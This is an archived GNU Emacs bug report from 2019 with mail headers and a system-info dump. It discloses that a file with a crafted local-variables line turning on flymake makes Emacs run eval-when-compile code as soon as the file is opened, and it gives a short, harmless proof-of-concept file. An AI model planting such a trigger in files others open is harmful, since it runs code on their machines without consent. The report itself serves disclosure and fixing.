From mboxrd@z Thu Jan 1 00:00:00 1970 Path: news.gmane.org!.POSTED.blaine.gmane.org!not-for-mail From: adam plaice Newsgroups: gmane.emacs.bugs Subject: bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x Date: Tue, 8 Oct 2019 10:48:32 +0200 Message-ID: Mime-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Injection-Info: blaine.gmane.org; posting-host="blaine.gmane.org:195.159.176.226"; logging-data="126231"; mail-complaints-to="usenet@blaine.gmane.org" To: 37656@debbugs.gnu.org Original-X-From: bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org Tue Oct 08 10:49:21 2019 Return-path: Envelope-to: geb-bug-gnu-emacs@m.gmane.org Original-Received: from lists.gnu.org ([209.51.188.17]) by blaine.gmane.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.89) (envelope-from ) id 1iHlBJ-000WjI-5e for geb-bug-gnu-emacs@m.gmane.org; Tue, 08 Oct 2019 10:49:21 +0200 Original-Received: from localhost ([::1]:52310 helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1iHlBI-0004dz-2p for geb-bug-gnu-emacs@m.gmane.org; Tue, 08 Oct 2019 04:49:20 -0400 Original-Received: from eggs.gnu.org ([2001:470:142:3::10]:58732) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1iHlB3-0004bh-Vi for bug-gnu-emacs@gnu.org; Tue, 08 Oct 2019 04:49:08 -0400 Original-Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1iHlB1-0008Mz-GN for bug-gnu-emacs@gnu.org; Tue, 08 Oct 2019 04:49:05 -0400 Original-Received: from debbugs.gnu.org ([209.51.188.43]:40658) by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_128_CBC_SHA1:16) (Exim 4.71) (envelope-from ) id 1iHlB0-0008Mf-Cd for bug-gnu-emacs@gnu.org; Tue, 08 Oct 2019 04:49:03 -0400 Original-Received: from Debian-debbugs by debbugs.gnu.org with local (Exim 4.84_2) (envelope-from ) id 1iHlB0-0001jZ-AI for bug-gnu-emacs@gnu.org; Tue, 08 Oct 2019 04:49:02 -0400 X-Loop: help-debbugs@gnu.org Resent-From: adam plaice Original-Sender: "Debbugs-submit" Resent-CC: bug-gnu-emacs@gnu.org Resent-Date: Tue, 08 Oct 2019 08:49:02 +0000 Resent-Message-ID: Resent-Sender: help-debbugs@gnu.org X-GNU-PR-Message: report 37656 X-GNU-PR-Package: emacs X-Debbugs-Original-To: bug-gnu-emacs@gnu.org Original-Received: via spool by submit@debbugs.gnu.org id=B.15705245356648 (code B ref -1); Tue, 08 Oct 2019 08:49:02 +0000 Original-Received: (at submit) by debbugs.gnu.org; 8 Oct 2019 08:48:55 +0000 Original-Received: from localhost ([127.0.0.1]:49479 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1iHlAt-0001j8-B0 for submit@debbugs.gnu.org; Tue, 08 Oct 2019 04:48:55 -0400 Original-Received: from lists.gnu.org ([209.51.188.17]:44455) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1iHlAq-0001j1-Sd for submit@debbugs.gnu.org; Tue, 08 Oct 2019 04:48:53 -0400 Original-Received: from eggs.gnu.org ([2001:470:142:3::10]:58680) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1iHlAp-0004Vr-6Z for bug-gnu-emacs@gnu.org; Tue, 08 Oct 2019 04:48:52 -0400 Original-Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1iHlAm-00087A-J8 for bug-gnu-emacs@gnu.org; Tue, 08 Oct 2019 04:48:50 -0400 Original-Received: from mail-lf1-x132.google.com ([2a00:1450:4864:20::132]:46634) by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_128_CBC_SHA1:16) (Exim 4.71) (envelope-from ) id 1iHlAl-00084z-A6 for bug-gnu-emacs@gnu.org; Tue, 08 Oct 2019 04:48:48 -0400 Original-Received: by mail-lf1-x132.google.com with SMTP id t8so11273802lfc.13 for ; Tue, 08 Oct 2019 01:48:47 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20161025; h=mime-version:from:date:message-id:subject:to; bh=qX9XxbTZQtaqEDETfa8WHDseV2I8VazEbcX9ZgePHCI=; b=FnIP4U5rqRQeTWJsm8X8rTR5sEa9ZkJq9d4iMC3LaYVUZUl7vFn0YDPCwgdGmxq17R CpoYXAbz3/NSaKpQke6s9n9AzIPb8mUp6JaYdJAb+NaKBWN6lRp1OYDI3LnALuyvDMnU 3tnxvlR7LN1v36sLzmZenSS4bM0vS0zS77QIn3aZCgSTrYE4qdDjQTOio4yFirm3j9bj Vx+vibnFRiKspi/Qhx+QmLG2lBo2Sx0iEcBQiCv2JMf/Ky624NUtuWN2af2GfYtrDIp7 laHSzA/gvgyulsdQr3GfVR7uwK1PEeB5W3vpN6CrnrL3gHfGhrSDSzArFU/ik29KBJAs 1AwQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20161025; h=x-gm-message-state:mime-version:from:date:message-id:subject:to; bh=qX9XxbTZQtaqEDETfa8WHDseV2I8VazEbcX9ZgePHCI=; b=ljd3gf8TqqQ+RvDe+OQvYnO8S3mM2dcRSceQph3HF88hq07DDh9XZ/5VuHwn+yy/v4 U6U4sse8hbLkQERoaB2ggN7WcHKM9tmPawgMvrlhFcnKdHzEj9quCdx++CN9sLihNQiP f8Dr4vUHRszKzKdDaiF43xdVK/wlQdbKsLtQQ5KO25BPI8l0jY2D3QQbrP/mFFNomU4t DwDl3ZX9aX0Y52BiFBCK7M1d+Irfg64042c1oF2h3XZ6KafWS7EuivUVrfgudvPnbZFo EFh8634umnljEyMnaSTUkf9aydFX0+iG2YT1ekgyhugf4dj4Z112yzSJPtDZWQdkpwlp mU0g== X-Gm-Message-State: APjAAAWVCJwdfXV3DPJPcVRTzKmeq0ZYCDaRpEVHFV63xVGnD38GCMis fwDn/yFl/RmOw7O7yDsj2JjwqPEF1JCV8RmokKc1UA== X-Google-Smtp-Source: APXvYqzZD8vOb1jrLX+gxiA5sunD+rnIV0ZOspc5QEtlALnXQSUdCKkauAtFgXgSEkQQzlrEm/0sOlKnvHHbO/e2874= X-Received: by 2002:ac2:4427:: with SMTP id w7mr19810629lfl.143.1570524524062; Tue, 08 Oct 2019 01:48:44 -0700 (PDT) X-detected-operating-system: by eggs.gnu.org: Genre and OS details not recognized. X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic] X-Received-From: 209.51.188.43 X-BeenThere: bug-gnu-emacs@gnu.org List-Id: "Bug reports for GNU Emacs, the Swiss army knife of text editors" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org Original-Sender: "bug-gnu-emacs" Xref: news.gmane.org gmane.emacs.bugs:168614 Archived-At: * To reproduce: 1. Create a file, say `~/foobar', (it could have an arbitrary extension) with the following contents: -*- mode: emacs-lisp; mode: flymake -*- (eval-when-compile (with-temp-file "~/emacs_flymake_security_bug" (insert "Could have also executed any code."))) 2. Open the file with emacs: emacs -Q ~/foobar 3. Inspect ~/emacs_flymake_security_bug: cat ~/emacs_flymake_security_bug * Expected result ~/emacs_flymake_security_bug does not exist. * Actual result ~/emacs_flymake_security_bug does exist. * Further information This relies on the "deprecated" feature of allowing `mode: ' to be repeated more than once, to also specify minor modes. Just having: -*- mode: flymake -*- in, say, `~/foobar.el' would not trigger the security bug. There may, however, be alternative ways of triggering it, that I haven't come up with. This was "inspired" by a very similar bug (concerning an external package, editorconfig), described here: https://illikainen.dev/blog/2019-10-06-editorconfig Thank you and best regards, Adam In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9) of 2019-10-07 built on adam Repository revision: 9839466b231b6384055b9b137405730876413cbe Repository branch: master Windowing system distributor 'The X.Org Foundation', version 11.0.11804000 System Description: Ubuntu 16.04.6 LTS Recent messages: For information about GNU Emacs and the GNU system, type C-h C-a. Configured using: 'configure --with-modules --without-pop' Configured features: XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY ACL LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP Important settings: value of $LANG: en_GB.UTF-8 locale-coding-system: utf-8-unix Major mode: Lisp Interaction Minor modes in effect: tooltip-mode: t global-eldoc-mode: t eldoc-mode: t electric-indent-mode: t mouse-wheel-mode: t tool-bar-mode: t menu-bar-mode: t file-name-shadow-mode: t global-font-lock-mode: t font-lock-mode: t blink-cursor-mode: t auto-composition-mode: t auto-encryption-mode: t auto-compression-mode: t line-number-mode: t transient-mark-mode: t Load-path shadows: None found. Features: (shadow sort mail-extr emacsbug message rmc puny dired dired-loaddefs format-spec rfc822 mml easymenu mml-sec password-cache epa derived epg epg-config gnus-util rmail rmail-loaddefs text-property-search time-date subr-x seq byte-opt gv bytecomp byte-compile cconv mm-decode mm-bodies mm-encode mail-parse rfc2231 mailabbrev gmm-utils mailheader cl-loaddefs cl-lib sendmail rfc2047 rfc2045 ietf-drums mm-util mail-prsvr mail-utils tooltip eldoc electric uniquify ediff-hook vc-hooks lisp-float-type mwheel term/x-win x-win term/common-win x-dnd tool-bar dnd fontset image regexp-opt fringe tabulated-list replace newcomment text-mode elisp-mode lisp-mode prog-mode register page tab-bar menu-bar rfn-eshadow isearch timer select scroll-bar mouse jit-lock font-lock syntax facemenu font-core term/tty-colors frame cl-generic cham georgian utf-8-lang misc-lang vietnamese tibetan thai tai-viet lao korean japanese eucjp-ms cp51932 hebrew greek romanian slovak czech european ethiopic indian cyrillic chinese composite charscript charprop case-table epa-hook jka-cmpr-hook help simple abbrev obarray minibuffer cl-preloaded nadvice loaddefs button faces cus-face macroexp files text-properties overlay sha1 md5 base64 format env code-pages mule custom widget hashtable-print-readable backquote threads dbusbind inotify lcms2 dynamic-setting system-font-setting font-render-setting move-toolbar gtk x-toolkit x multi-tty make-network-process emacs) Memory information: ((conses 16 44045 5448) (symbols 48 5971 1) (strings 32 15685 1582) (string-bytes 1 506409) (vectors 16 9198) (vector-slots 8 123144 8510) (floats 8 19 25) (intervals 56 186 0) (buffers 1000 11) (heap 1024 12431 1138))